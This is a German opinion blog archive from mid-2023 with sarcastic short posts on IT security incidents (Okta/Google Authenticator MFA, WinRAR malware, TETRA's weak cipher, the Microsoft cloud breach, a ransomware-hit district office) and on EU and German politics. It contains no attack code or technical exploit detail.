Für mich stellen sich da ja noch ein paar mehr Fragen. Kommt die On-Prem-Software und ihre Updates nicht am Ende auch aus besagter Cloud? Aber das ist eine Frage für einen anderen Tag. Das Money Quote aus diesem Artikel ist folgendes:
The fact that Google Authenticator syncs to the cloud is a novel attack vector. What we had originally implemented was multi-factor authentication. But through this Google update, what was previously multi-factor-authentication had silently (to administrators) become single-factor-authentication, because control of the Okta account led to control of the Google account, which led to control of all OTPs stored in Google Authenticator.
Well … fuck. :-)

Sat Sep 9 2023

[l] Die EU-Antikorruptionsbehörde OLAF ist eine Lachnummer vor dem Herrn. Die ist geradezu gezielt darauf ausgelegt, bloß nichts ausrichten zu können.
Denn OLAF kann nur beschränkt ermitteln, also selbst weder Strafverfolgungen aufnehmen noch Urteile aussprechen. Wenn OLAF eine Ermittlung durchführt und zu einem Ergebnis kommt, dann geben die Ermittler ihre Recherchen entweder an die nationalen Strafverfolgungsbehörden oder an die europäische Staatsanwaltschaft weiter. Letztere wird aber in Ländern wie Polen und Ungarn nicht anerkannt.
Ach. Ach was. Die korruptesten Länder können einfach die Staatsanwaltschaft nicht anerkennen, und fertig ist die Laube? WAT?!
Ermittlungen innerhalb der Nationalstaaten verliefen häufig im Sande, stellt Ákos Hadházy fest. Der unabhängige ungarische Abgeordnete gilt als Einzelkämpfer gegen Korruption in seinem Land.
Schockierend!!1! Die ermitteln einfach nicht gegen sich selbst?!?
Es gibt nicht einmal eine Pflicht für Polizei und Staatsanwaltschaft, nach Ermittlungen der Antikorruptionsbehörde die Empfehlungen der OLAF weiterzuverfolgen. In zwei Dritteln aller Fälle passierte in den EU-Staaten 2022 nichts. Das geht aus dem jüngsten Bericht hervor.
Der Hammer ist, dass diese Behörde trotzdem 600 Mio aufgeklärte Korruption vorweisen kann für letztes Jahr. Wie haben sie das denn gemacht?
Update: Die Spezialexperten der Tagesschau rechnen aus, dass 600 Millionen von 170 Milliarden 0,004% seien. Es sind 0,4%. Ist das eigentlich Einstellungskriterium im Journalismus, dass man keine Prozentrechnung kann?

Sat Sep 2 2023

[l] Bitkom hat eine Umfrage gemacht. Bitkom ist der IT-Branchenverband. Mir sind die noch nie positiv aufgefallen, im Gegenteil. Immer wenn jemand eine sinnvolle Maßnahme vorschlägt, sagt Bitkom, dass das zu teuer wäre und nicht geht. Außer der Steuerzahler zahlt die Zeche, klar. Ich halte zu denen jedenfalls einen gehörigen Sicherheitsabstand.
In dieser Umfrage geht es um Cyberkriminalität. Wichtige Zahlen:
Damit liege der Schaden zum dritten Mal in Folge über der Marke von 200 Milliarden Euro
[...]
Erstmals fühlten sich 52 Prozent der Betriebe durch Cyberangriffe in ihrer Existenz bedroht
[...]
75 Prozent der befragten Firmen halten die Sicherheitsbehörden gegen Angriffe aus dem Ausland für machtlos.
Für mich der perfekte Moment für ein bisschen Zurücklehnen und die Teilnehmer von der Tribüne aus Beschimpfen :-)
Na, liebe Firmen? Rückblickend immer noch zufrieden mit euren Entscheidungen, das tödliche Trio (Windows + Active Directory + Office) einzusetzen? Würdet ihr das jetzt wieder so machen, nichts in Security zu investieren, und stattdessen sinnloses Compliance-Theater zu fahren?
Bitkom würde jedenfalls, denn deren Lösung ist ...
Er forderte eine Meldepflicht für Firmen im Fall von Cyberangriffen.
Oh ja, Meldepflichten! Die haben ja auch zu einer massiven Verbesserung der Sicherheitslage bei Kritis-Unternehmen geführt! (Das war Sarkasmus)
Ich bin ja immer noch stocksauer über den gestern verlinkten Podcast. Die haben sofort ans BSI gemeldet, und gebracht hat es natürlich gar nichts. Dann haben sie die Bundeswehr um Hilfe gebeten und der bundesweite Steuerzahler hat die Kosten übernommen. KLAR wird das dann nicht besser, wenn nie jemand für sein Versagen die Kosten tragen muss!
Der Landkreis hat jahrzehntelang die Kosten für ordentlich machen gespart und dann die Kosten für die Reparatur nicht tragen müssen, sondern sich da als Opfer geriert und den Katastrophenfall ausgerufen. Könnt ich mich endlos drüber aufregen!
Die Ursachenforschung war dann nach "naja wir haben halt nie die Zeit gehabt, das ordentlich zu machen" abgeschlossen. Und dann hatten sie noch die Stirn, diesen IT-Typen da zum Helden zu stilisieren, weil der jetzt Überstunden fährt bei der Reparatur des von ihm verursachten Problems, und sich heldenhaft nicht rasiert, bis das repariert ist.
Gegen Ende hab ich den Podcast abgebrochen, weil sie da ernsthaft zu diskutieren anfingen, welcher Russe das ihrer Meinung nach gewesen sein könnte, und was der sonst so für kriminelle Dinge tut. Leute, wenn bei euch jemand reinhackt, ist das in praktisch 100% der Fälle eure Schuld. Es gibt Ausnahmen, aber die sind Rundungsfehler in der Häufigkeitsverteilung.
Wenn ihr Hilfe beim Identifizieren der Verantwortlichen braucht, dann guckt am besten kurz in den Spiegel. Oh, da ist er, der Verantwortliche!
Update: Wohlgemerkt: In den Schadenssummen sind die Kosten für Schlangenöl und co noch nicht drin. Das sehen die Bitkom-Heinis und die verstrahlten Befragten ja nicht als Schaden sondern als Investition. Das kommt noch obendrauf.

Fri Sep 1 2023

[l] Der mdr hat einen Podcast zu Ransomware in der Verwaltung gemacht. Wäre vielleicht nicht schlecht, wenn sich das Zuständige in anderen Verwaltungen mal anhören könnten.
Update: Aufmerksamen Hörern wird schnell auffallen, dass sie das tödliche Trio Windows - Outlook/Office - Active Directory nicht erwähnen. Wird von denen eher wie Sturmschäden behandelt.
Ich finde ja immer bemerkenswert, wie die Zuständigen in solchen Situationen immer optimistisch sind. Wir rufen jetzt hier ein paar Leute an und dann regelt sich das von alleine.
Update: Wobei, ist eigentlich nicht erstaunlich. Die gehen ja auch genau so mit Tool-Käufen um. Wir kaufen jetzt ein SIEM, dann kümmert sich jemand um die Logfiles!1!!
In Episode 2 gibt es nochmal ein schönes Money Quote. Externe Forensiker gucken sich die Logfiles an und finden darin, dass die Angreifer schon länger im System sind, und sich immer am Wochenende und nachts in Ruhe umgeguckt haben im System. Daraufhin der IT-Fuzzy so: Wieso haben wir denn das nicht gemerkt? Sein Kollege dazu: Wann hattest du denn das letzte Mal Zeit, dir Logdateien anzuschauen?
Tja, und so ist das dann halt. Keiner ist Schuld. Hätte man nichts machen können. Wir sind jedenfalls nicht schuld hier.
Update: Oh Mann. Das wird immer schlimmer. In Folge 2 bei 32 Minuten so: Jeder Mitarbeiter im Landkreis war auf seinem PC lokaler Administrator.
Update: Oh und die IT-Mitarbeiter waren auch alle Domain Admins. Mit ihrem normalen Account. Das ist ja unfassbar.
Update: Überlegt mal, wenn das bei DENEN so aussieht, wie das dann bei euren örtlichen Behörden aussehen wird. Die, denen ihr gesetzlich verpflichtend eure Meldedaten anvertrauen müsst.
Update: Die in Kapitel 2 genannte Dienstelister-Firma Suresecure hat einen Blogpost zu der Angelegenheit veröffentlicht.

Wed Aug 30 2023

[l] Wo wir gerade bei unseriösen Presseorganen waren, die mit einer "eidesstattliche Versicherung" ihrer anonym bleibenden Quellen einen auf dicke Hose machen: Der Bayerische Rundfunk zur Causa Aiwanger:
"Ich kenne Hubert Aiwanger aus der Schule, Burkhart-Gymnasium Mallersdorf. Ich war im gleichen Jahrgang mit ihm und wir haben dort 1990 das Abitur gemacht", schildert der Mann, der eine eidesstattliche Versicherung abgegeben hat, namentlich aber nicht genannt werden möchte - zum Schutz von Angehörigen.
(Kontext) (Danke, Joschka)

Thu Aug 24 2023

[l] Benutzt hier jemand Winrar?
BleepingComputer tested a malicious archive shared by Group-IB, who discovered the campaign, and simply double-clicking on a PDF caused a CMD script to be executed to install malware.
Damit wurden offenbar über Monate Crypto-Wallets aufgemacht und ihr Inhalt gestohlen. Schnell updaten also, wenn ihr das einsetzt.
Update: RAR wird auch von hunderten von 3rd-Party-Tools entpackt. Die verwenden dafür entweder den Open-Source-Unrar-Code oder unrar.dll oder unrar64.dll. Diese DLLs zumindest sind wohl auch betroffen. Das inkludiert dann vermutlich einmal alle Schlangenöl-Installationen auf diesem Planeten.

Wed Aug 23 2023

[l] Wisst ihr noch, als die Zentralbank Negativzinsen hatte?
Als die Banken alle anfingen, Kontoführungsgebühren zu verlangen, und ein Limit für Einlagen verhängen wollten?
Nun, die Negativzinsen sind weg, aber völlig überraschend haben die Banken ihre Gebühren nicht zurückgenommen. Na sowas.
Ich würde mich ja bei meiner Bank beschweren gehen, aber die haben alle Filialen in meiner Nähe zugemacht.

Fri Aug 18 2023

[l] Die Gema hat mal kurz die Tarifstruktur geändert. Ergebnis:
Es geht um knapp 40.000 Euro. Zum Vergleich: Beim Christkindlesmarkt 2019 waren es noch 493 Euro. Die Preissteigerung liege demnach an einer von der "Gema" eingeführten, neuen Tarifstruktur. Die Änderung sei nicht angekündigt worden.
Da muss er sein, der War on Christmas, von dem man immer so viel hört aus Amerika!1!!

Fri Aug 11 2023

[l] News Corp hat dieses Jahr 75% weniger Profit gemacht. Wobei letztes Jahr für die ein Rekord war, vielleicht einfach ein Ausreißer.
Spannend daran fand ich jedenfalls das hier:
Rupert Murdoch’s News Corporation has recorded a steep 75% drop in full-year profit but sees opportunities ahead as it expands the use of cost-saving AI-produced content.
Warte, expands? D.h. sie machen jetzt schon "KI"-"Content"? Wie sich rausstellt: Ja, machen sie!
Auch bemerkenswert ist deren Konzernumsatz: 10 Milliarden Dollar. Zum Vergleich: Axel Springer macht knapp 4 Milliarden Euro Jahresumsatz.
[l] Wer "zu wenig Entropie in den Zufallszahlen" für ein gelöstes Problem aus den Geschichtsbüchern hält, hat seine Rechnung ohne Bitcoin-Bros gemacht. Wobei man da ja in dem Umfeld fast darüber nachdenken kann, ob das Absicht gewesen sein könnte, um dann den Leuten die Konten leerräumen zu können.
[l] Zur Inklusionsfrage kommt noch ein Leser-Tipp rein:
in einer Monitor Reportage sah ich letztens, dass die Anzahl der Förderschüler seit dieser Inklusionswelle geradezu sprunghaft angestiegen sind. Hintergrund ist wohl, dass die normalen Schulen für diese Schüler deutlich mehr Geld bekommen (auch wenn es nicht mehr Lehrer oder Förderkräfte gibt) und daher angefangen haben, schlechte oder schwierige Schüler als solche mit speziellem Förderungsbedarf einzustufen, um an diese Extrakohle zu kommen und ihre Inklusionsziele zu erfüllen, ohne wirklich Schüler mit entsprechendem Förderbedarf annehmen zu müssen. Eltern wehren sich da auch teilweise hart dagegen, dass ihr Kind derart eingestuft wird, weil das die Zukunftschancen der Kinder massiv beeinträchtigt.
Hier der Mediathek-Link: Monitor: Inklusion an Schulen.

Thu Aug 10 2023

[l] Ihr habt ja sicher mitgekriegt, dass die Ozeane einen Hitzerekord nach dem nächsten brechen in letzter Zeit.
Hier hat jemand eine Theorie dazu. Er meint, dass wir jahrzehntelang versehentlich Geoengineering gemacht haben, und das die Ozeane kühler hielt, als sie eigentlich gewesen wären, und daher der Klimawandel nicht so schlimm aussah wie er war.
Wie haben wir die Ozeane gekühlt? Mit Schwefeldioxid! Aus den furchtbaren Schadstoffmixen, die unsere Frachtschiffe so in die Luft gepumpt haben. Wenn man Schwefeldioxid in die Luft pumpt, dann bilden sich Aerosole mit Schwefelsäure und Saurer Regen (weshalb die International Maritime das jetzt endlich wegregulieren wollte).
Aber die so entstehenden Wolken reflektieren halt auch Sonnenlicht weg von der Erde. Money Quote:
In the shipping corridors, the increased light represents a 50% boost to the warming effect of human carbon emissions. It’s as if the world suddenly lost the cooling effect from a fairly large volcanic eruption each year, says Michael Diamond, an atmospheric scientist at Florida State University.
Die Idee, dass die Menschen mit Geoengineering ihr Überleben retten können, ist besonders unter Tech Bros sehr populär. Die Vorschläge gehen von "Spiegel in den Orbit packen" über "Künstlich Wolken machen und die besonders weiß kriegen", z.B. indem man Schiffe Salz in die Luft schicken lässt.
Kann halt kaum jemand absehen, was das für negativen Nebenwirkungen haben würde.
Update: Leser schreiben mir, dass das mit Flugzeugen genau so sei. Als nach 9/11 der Flugverkehr für ein paar Tage wegbrach, konnte man das auf der Erde in mehr Wärme und mehr Wasserverdunstung sehen. (Danke, Christian)

Tue Aug 8 2023

[l] Italien führt Übergewinnsteuer für Banken ein.
Italien will die hohen Gewinne der Banken abschöpfen. Das Geld soll Familien und Unternehmen zufließen, die unter der höheren Inflation leiden.
Die Banken können jetzt eher nicht so viel für die Inflation, aber denen die Gewinne abzuschöpfen finde ich absolut in Ordnung. Allerdings:
Mit dieser neu eingeführten 40-prozentigen Steuer hofft die Regierung, "einige Milliarden" Euro einzunehmen, um wiederum die Bürger zu entlasten
Da stellen sich ein paar Fragen, finde ich. Fragen wie: Wieso nur 40%?
Wieso braucht es dafür die Faschisten?
Was haben eigentlich die Kommunisten all die Jahre an der Regierung gemacht?

Fri Aug 4 2023

[l] Ein Leser weist auf ein Urteil des OLG Karlsruhe hin, das vielleicht den einen oder anderen von euch betreffen könnte.
Es ging um den Verkauf eines Gebrauchtwagens, die Rechnung sollte per E-Mail rausgehen. Der Verkäufer schickt also die E-Mail, aber drei Minuten später geht eine zweite E-Mail mit einer leicht modifizierten Rechnung beim Käufer ein. Die Kontonummer war eine andere und zeigte auf ein Konto, das nicht dem Verkäufer gehörte.
Das merkte der Käufer nicht und überwies dorthin. Der Verkäufer wollte sein Geld haben. Das Landgericht hat die Klage abgewiesen, weil der Käufer ja gezahlt hatte, wenn auch nicht an den Verkäufer. Das OLG hat jetzt andersherum entschieden.
Die Details sind nicht sehr schön, finde ich:
Um 11:46 Uhr erhielt der Geschäftsführer der Beklagten eine weitere E-Mail von der E-Mail-Adresse der Klägerin mit einer neuen Rechnung im Anhang.
Das ist trivial fälschbar, sogar weitgehend ohne technische Kenntnisse. Die relevante Frage wäre gewesen, ob die Mail vom Mailserver des Verkäufers kam. Das kann man im Header der Mail sehen. Dann hätte man sagen können, wer sich hier von bösen Hackern hat hacken lassen. Wenn sich der Verkäufer hacken lässt, hätte ich gesagt, dass der auch auf dem Schaden sitzenbleibt. Wenn der Verkäufer sich verarschen lässt, hätte ich gesagt, dass der auf dem Schaden sitzen bleibt. Aber das haben die hier offenbar gar nicht nachgeschaut.
Danach kommt dieser bemerkenswerte Abschnitt:
Die Klägerin hat ihr E-Mail-Konto beim Anbieter W. Es ist mit einem Passwort geschützt, das zwei Personen im gesamten Betrieb der Klägerin bekannt war und alle zwei bis vier Wochen durch eine der beiden Personen geändert und der anderen mündlich mitgeteilt wurde. Computer und Software der Klägerin sind über die Windows Firewall geschützt, die regelmäßig aktualisiert wird. Darüber hinaus sind Computer und Software über die Vollversion von „X.-Internet-Security“ geschützt.
Wie viele Leute im Betrieb das Passwort kennen ist irrelevant. Die E-Mail bei einem externen Dienstleister haben ist ein schlechtes Zeichen. Damit erweitert sich die mögliche Tätergruppe auf diesen Dienstleister, und wer da alles Zugriff hat, das wissen die Kunden ja nicht mal.
Passwortrotation ist Theater. Nicht nur nutzlos sondern sogar kontraproduktiv. Wen du dich bei einer Firma bewirbst, und die rotiert die Passwörter, dann ziehe die Bewerbung sofort zurück. Die machen dann auch alles andere falsch.
Die "Windows Firewall" tut natürlich gar nichts gegen den Abfluss von Passwörtern, weder vom E-Mail-Provider noch bei der Firma selbst.
Und dass sie noch irgendein nutzloses Schlangenöl drüberinstalliert haben, ist auch ein schlechtes Zeichen. Die wissen offensichtlich nicht, was sie tun. Und geholfen hat es ihnen ja auch nicht.
Der Käufer hat dann noch folgendes zu seiner Exkulpation auszuführen versucht:
Die Beklagte behauptet, es sei zum Versand der zweiten E-Mail an sie durch einen Dritten dadurch gekommen, dass auf das E-Mail-Konto der Klägerin eine Hacking-Attacke ausgeführt worden sei, die das Ausspionieren der Geschäftsbeziehung der Parteien und der Rechnungs-E-Mail ermöglicht habe. Dies sei durch mangelnde Vorsichtsmaßnahmen der Klägerin ermöglicht worden, wofür ein Anscheinsbeweis spreche; konkret nennt die Beklagte insoweit die nicht erfolgte Verwendung des „sender policy framework (SPF)“ bei der Kommunikation sowie eine unterlassene Verschlüsselung der pdf-Datei. Nach den Ausführungen im angefochtenen Urteil, die die Beklagte sich im Berufungsverfahren zu Eigen gemacht hat, sei der Klägerin vorzuwerfen, dass sie keine Ende-zu-Ende-Verschlüsselung oder Transportverschlüsselung verwendet habe. Die Beklagte macht sinngemäß geltend, die Verwendung der genannten Verfahren sei im Geschäftsverkehr zwischen Unternehmen wie den Parteien des Rechtsstreits üblich und zu erwarten.
Ende-zu-Ende-Verschlüsselung kann man nur machen, wenn man vorher Schlüssel ausgetauscht hat. Mit jemandem, der auf schlecht gefälschte Rechnungen reinfällt, kannst du auch keinen Schlüssel sicher austauschen.
Wenn tatsächlich eine der beiden Seiten gehackt war, dann kannst du auch keinen Schlüssel austauschen, ohne dass ihn der Angreifer abgreifen kann.
Eine Transportverschlüsselung hilft überhaupt nichts gegen gehackte Mailserver.
Kein SPF haben ist kein Anzeichen für gehackt worden sein.
Der Versender hätte Adobe-Krypto-Kram kaufen und benutzen können, dann wäre sein PDF signiert gewesen. Aber wieso wir davon ausgehen sollen, dass der Käufer gemerkt hätte, dass nur das eine PDF signiert war, leuchtet mir nicht ein. Und natürlich hätte auch das Angreifer-PDF signiert worden sein können, dann halt von irgendeinem anderen Zertifikat, vielleicht mit einer Tippfehler-Domain oder so.
Meine Zusammenfassung des Falls ist: Hilflose Leute sind hilflos und machen hilflose Handbewegungen. Am Ende sagt man: Softwareproblem. Kann man nichts machen. Und das Leben geht weiter.

Wed Aug 2 2023

[l] Dass es heute schwierig ist, eine Privatsphäre zu haben, ist schon länger klar. Ich habe z.B. immer versucht, mein Privatleben möglichst nicht öffentlich abrufbar zu haben. Schlimm genug, was man so schon ungewollt für Metadaten hinterlässt.
Mein Blog hat z.B. nicht meine Heimanschrift im Impressum sondern die Raumfahrtagentur. Mein Blog hat deshalb keine Zeitstempel im RSS (außer dem Tag). Klar kann man scrapen und selber Zeitstempel anbringen, aber ich muss das ja nicht auch noch freiwillig veröffentlichen. Um welche Uhrzeit ich wach bin, geht euch nichts an. Finde ich.
Sehr empfindlich reagiere ich auch, wenn irgendwelche Leute mein Geburtsdatum haben wollen. Besonders irritierend finde ich, dass Hotels in allen möglichen Ländern und Bundesländern irgendwelche Formulare ausgefüllt haben wollen.
Stellt euch also meine Überraschung vor, als mir heute jemand zum Geburtstag gratulierte, und schrieb, er habe das aus dem "Checkpoint"-Newsletter des Tagesspiegels erfahren.
Wat? Woher hat denn bitte der Tagesspiegel mein Geburtsdatum!? Und wieso drucken die das in ihrem Newsletter ab?!? Wenn ich nicht wüsste, dass ich nüchtern wäre, wäre jetzt der Zeitpunkt für einen Drogentest :-)
Es kann sein, dass die einfach Google gefragt haben. Klar. Ich finde das übrigens ausgesprochen gruselig, dass Google die Frage nach meinem Geburtstag beantwortet. Nicht nur sollten die den nicht wissen, sie sollten ihn auch sonst niemandem verraten. Finde ich.
Ich habe dann noch nach einem Screenshot von diesem Tagesspiegel-Newsletter gefragt. Hier ist er.
Was für ein Fnord.
Woher weiß Google meinen Geburtstag? Das liegt vermutlich daran, dass ihn irgendwann jemand bei Wikipedia eingetragen hat, und Google inhaliert regelmäßig Wikipedia als "Knowledge Graph". Ich habe Wikipedia damals angeraunzt und sie haben das weggemacht, aber das heißt natürlich nicht, dass Google das auch "vergisst".
Wenn ihr also euer Geburtsdatum geheimhalten wollt, dann meldet am besten kein Gewerbe an. Das OLG Celle hat im April erst entschieden, dass das kein Datenschutzverstoß ist. Auch nicht jetzt, wo das kostenlos digital einsehbar ist.
Ich werde das Datum hier weder bestätigen noch dementieren, aber dass ich inzwischen ein alter Mann bin, lässt sich eh nicht mehr abstreiten :-)

Tue Aug 1 2023

[l] Was haben die Leute alle mit Wacken? Versteh ich nicht.
Das ist doch der Stoff, aus dem epische Erinnerungen gemacht werden! Da kann man noch seinen Enkeln von erzählen!
Glastonbury sieht jedes Jahr wie ein Schlammloch aus, und die Leute lieben es und kommen immer wieder.

Fri Jul 28 2023

[l] Nachdem Microsofts Cloud einmal so nachhaltig zerhackt wurde, dass es sich nicht mehr komplett leugnen ließ, ist ja aus meiner Sicht eigentlich alles klar.
Finger weg von der Microsoft-Cloud. Nicht nur jetzt akut. Für immer. Einem Hersteller, der so ein Vorkommnis nicht nur überhaupt stattfinden lässt, sondern dann auch noch die Kunden mit Platitüden und "aber aber aber DIE CHINESEN!!1!" abzuspeisen versucht, dem kann man jetzt und in Zukunft nie wieder trauen. Davon erholst du dich nicht als Anbieter.
Cloud-Anbieter sind mehr noch als reguläre Software-Anbieter auf Vertrauen angewiesen. Die können nicht in den Pool pinkeln und dann so tun als sei nichts gewesen. Einer Schließfach-Firma, bei der sich rausstellt, dass jedes Schließfach mit jedem Schlüssel zu öffnen ist, würde man ja auch nie wieder vertrauen. Würdet ihr noch Schlafmittel vom Contergan-Hersteller kaufen?
Das Problem ist, dass die Publikationen, die da jetzt aber mal so richtig auf die Scheiße hauen müssten, sich selber völlig ohne Not von Microsoft abhängig gemacht haben. Nur nur weil sie deren Produkte einsetzen, sondern auch weil sie von Microsofts Werbebudgets abhängig sind.
Und so kommt es zur peinlichsten Nummer diesen Sommer. Ja, peinlicher als der "Löwe" in Berlin. Heise Security schreibt einen Fragenkatalog für Microsoft auf. Microsoft antwortet natürlich nicht. Daher der Fragenkatalog. IHR sollt Microsoft die Fragen stellen, die sie schon Heise nicht beantwortet haben. Vielleicht kriegt IHR ja eine Antwort!1!!
Was für eine Zurschaustellung von Hilflosigkeit! Money Quote aus dem Artikel:
Der Verlag setzt selbst auch Microsoft-Dienste wie Microsoft-Teams ein. Deshalb haben wir auch aus der Sicht eines möglicherweise betroffenen Unternehmens nachgehakt und Fragen gestellt
Ja, äh, und auf die Idee ist keiner gekommen, den ganzen Microsoft-Scheiß sofort rauszuschmeißen?
Aber aber aber Fefe, das ist doch total unrealistisch. Ohne Windows und Outlook und Active Directory kann man doch gar keine Ransomware kri... äh ich meine kann man doch gar nicht arbeiten!!1!
Na dann macht mal alle weiter, ihr Verstrahlten. Hey, wieso stellt ihr nicht Microsoft die Fragen von Heise? Vielleicht kriegt ihr ja eine Antwort!
Seid ihr eigentlich auch so froh, dass wir eine so freie und unabhängige Presse haben?
Update: Versetzt euch mal kurz in Microsofts Management rein. Würdet ihr angesichts dieser Reaktion auf den größtmöglichen Verkacker bei ihnen jemals wieder auch nur einen Dollar in Security stecken? Ist ja offensichtlich völlig überflüssig. Die Kunden sind eh gefangen. Lass uns denen lieber noch "Threat Intelligence" verkaufen oder ähnlichen Scheiß. Solange die Geld-Pipeline den Kunden weiter Abogebühren aus der Nase zieht, ist doch alles gut!
Update: Freut mich, wie viele entsetzte Mails ich gerade zu Grünenthal kriege. Ja, nicht nur gibt es die noch, die verkaufen heute Opioide. Inklusive des am häufigsten verordneten Opioids, Tramadol. Hand aufs Herz, wie viele von euch wussten das?
Update: Hey, wo wir gerade bei Contergan sind ... sagt euch Heinrich Mückter was? Hier ein Spiegel-Artikel von 2007 dazu.

Wed Jul 26 2023

[l] Die Polizei hat das Handy des Thüringer CDU-Chefs Mario Voigt aufgemacht. Der wird der Korruption verdächtigt und hatte initial erklärt, er wolle bei den Ermittlungen gegen sich mithelfen, hat dann aber den Entsperrcode für sein Handy nicht rausgerückt.
Hier der bemerkenswerte Absatz:
Erst mit Hilfe einer Spezialsoftware habe die Polizei das Handy entsperren können. Das sei erst möglich gewesen, nachdem der Hersteller ein Update für eine Software zur Verfügung gestellt habe.
Was genau soll das heißen? Der Hersteller hat dem Handy per Update-Prozess eine für die "Spezialsoftware" verwundbare Version übergeholfen?
Oder... die "Spezialsoftware" kommt gar vom Hersteller und der hat denen ein Update gegeben, damit sie das Telefon aufmachen können?
In beiden Fällen kooperiert der Hersteller mit der Polizei gegen seine Kunden. Da hätte ich ja gerne den Namen des Herstellers erfahren.
Oh warte, das "Hersteller" kann sich auch auf den Hersteller der "Spezialsoftware" beziehen. Wieso würden sie das dann aber hier erwähnen?

Tue Jul 25 2023

[l] Die Krypto in TETRA ist lächerlich schwach. TETRA ist der digitale Behördenfunk für Polizei und Feuerwehr. Da ist "geheime" Crypto aus den 90ern drin, was ja immer schon direkt ein sehr schlechtes Zeichen ist.
Jetzt haben ein paar holländische Hacker einen Blick geworfen und gefunden, was ihr jetzt vermutlich schon vermutet habt.
All four TETRA encryption algorithms use 80-bit keys, which, even more than two decades after their release, still provides sufficient security to prevent someone from cracking them, the researchers say. But TEA1 has a feature that reduces its key to just 32 bits—less than half the key’s length. The researchers were able to crack it in less than a minute using a standard laptop and just four ciphertexts.
Ja, richtig gelesen! Die elenden Crypto-Backdoor-Sprallos in der Politik haben diesmal nicht nur die Bevölkerung unsicher gemacht sondern auch ihren eigenen Behördenfunk! Money Quote:
Brian Murgatroyd, chair of the technical body at ETSI responsible for the TETRA standard, objects to calling this a backdoor. He says when they developed the standard, they needed an algorithm for commercial use that could meet export requirements to be used outside Europe, and that in 1995 a 32-bit key still provided security, though he acknowledges that with today’s computing power that’s not the case.
Die Ausreden-Olympiade in diesem Fall erreicht auch epische Ausmaße, wenn die Backdoor-Fuzzys sich mit sowas hier rauszureden versuchen:
Murgatroyd insists the most anyone can do with the backdoor is decrypt and eavesdrop on data and conversations. TETRA has strong authentication, he says, that would prevent anyone from injecting false communication.
Oh ACH SO! Damit kann man nur mithören und nicht einfach Fälschungen senden! Na DANN ist ja alles gut!1!! Also ... unter der Annahme, dass das stimmt. Tut es aber nicht.
“That’s not true,” says Wetzels. TETRA only requires that devices authenticate themselves to the network, but data and voice communications between radios are not digitally signed or otherwise authenticated. The radios and base stations trust that any device that has the proper encryption key is authenticated, so someone who can crack the key as the researchers did can encrypt their own messages with it and send them to base stations and other radios.
Lügner sind eine nachwachsende Ressource.
Update: Das betrifft Deutschland offenbar nicht, weil wir ein Smartcard-Layer für starke Authentisierung drüber haben, und ein Crypto-Layer mit E2E-Verschlüsselung.

Wed Jul 19 2023

[l] Bidens Gesundheitsministerium stoppt Zahlungen an das Wuhan Institute for Virology.
Ihr wisst schon, das Covid-Forschungslabor in Wuhan, wo Covid ausbrach, die Gain-of-Function-Forschung an Coronaviren gemacht haben.
Öhm ... was haben jetzt nochmal die Nordkoreaner gemacht?

Tue Jul 18 2023

[l] Ich mecker hier ja häufig und gerne über Verkacken der Berliner Politik. Stellt sich raus: Köln ist noch schlimmer. Da haben zwei Profi-Musiker kostenlos im Park Loungejazz gespielt. Kam das Ordnungsamt, hat das Konzert gestoppt und denen ein Knöllchen übergeben.
In Berlin läuft ja nicht viel gut, aber da hätte der Senat glaube ich eine Tourismus-Chance drin gesehen und Werbung dafür gemacht, statt des kaputtzumachen.
Update: Das Ordnungsamt der Stadt Köln ist schon häufiger negativ aufgefallen. Die haben es sogar zu extra3 geschafft.
[l] Die EU-Kommission lässt sich jetzt in Wettbewerbsfragen bezüglich US-Tech-Konzernen von einer US-Amerikanerin beraten, die vorher Lobbyarbeit für *unterlagenblätter* US-Tech-Konzerne gemacht hat.
Ihren Posten als "Chefökonomin" in der Generaldirektion Wettbewerb soll sie am 1. September antreten. Scott Morton war von Mai 2011 bis Dezember 2012 leitende Wirtschaftsanalystin in der Kartellabteilung des US-Justizministeriums, später arbeitete sie als Beraterin für große Tech-Konzerne wie Apple und Microsoft. Brüssel hat in den vergangenen Jahren Rekordstrafen gegen einige Konzerne verhängt.
Damit ist dann jetzt wohl Schluss, denke ich.
Keine Ahnung, wieso der Sonneborn noch auf Twitter publiziert, aber er hat sich dazu dort umfangreich geäußert und das ist auch ohne Twitter-Account lesbar. Verstehe einer die Regeln dort. Wie immer bei Sonneborn alles eine Reihe von Money Quotes. Ich will hier mal eines herausgreifen:
In den Unterlagen zum letzten Treffen des Kollegiums am 11. Juli war die Neubesetzung (wohlweislich) im Anhang eines am Vortag per Email übersandten Dokumentenstapels versteckt, am Ende langer Litaneien zu anderen Themen und einer Reihe anderer, völlig unspektakulärer Neubesetzungen.
Der Hauptteil der 26-seitigen Passage zum Posten des Chefökonomen war den zehn abgelehnten Kandidaten gewidmet, unter ihnen etwa der Spanier Juan José Ganuza Fernández. Und die Darstellung von Mortons Vita schließlich kaprizierte sich auf die zu erwartende Muttersprache („Englisch“), während die dazugehörige Nationalität (USA) einfach gänzlich unterschlagen wurde. „Es gab keinen Hinweis darauf, dass sie Amerikanerin war. Wir dachten alle, sie sei Irin“, berichtet ein Hoher Beamter der französischen Libération und versichert, niemand habe eine Ahnung gehabt, worüber da eigentlich abgestimmt wurde. „Wir haben erst auf Twitter herausgefunden, dass wir etwas Inakzeptables akzeptiert hatten“.
Das finde ich eine passende Zusammenfassung des Parlamentarismus in der EU, auch in Deutschland. Niemand weiß, was da eigentlich gerade abgestimmt wird. Die eigentlichen Dinge sind schon im Vorfeld "geklärt" worden. Und wir erzählen dann Saudi Arabien was von Demokratie und China was von Menschenrechten. Prost!
Update: Gibt es auch bei Sonneborn auf der Homepage, ohne Twitter.

Wed Jul 12 2023

[l] Cyber-Versicherung kann nicht argumentieren, die gehackten Server seien unzureichend gesichert gewesen. Begründung: Waren sie auch schon beim Abschluss der Versicherung.
Die Details sind interessant. Und zwar hat die Versicherung dann prüfen lassen, wie schlecht die Security war, und sie war branchentypisch GANZ furchtbar:
Von 21 Servern verfügten nach den Feststellungen des Sachverständigen nur 10 über die erforderlichen Sicherheitsupdates. Bei 11 Servern hatte man es folglich versäumt, die Software-Updates einzuspielen.
Die Versicherung fand, dass das dann ja wohl eine klare Nummer war, dass die Firma fahrlässig die Sicherung ihrer Systeme unterlassen hat und sie daher nicht zahlen muss. Das Gericht fand aber:
Der Cyberangriff war jedoch bei insgesamt 16 der 21 Server erfolgreich und betraf Systeme mit allen Betriebssystemversionen, darunter auch die aktuelle Version Windows Server 2019.
Die argumentieren also, dass auch ihre ordentlich gepatchten Systeme erfolgreich aufgemacht wurden, und daher der Patchstand ja wohl keine Rolle spielt.
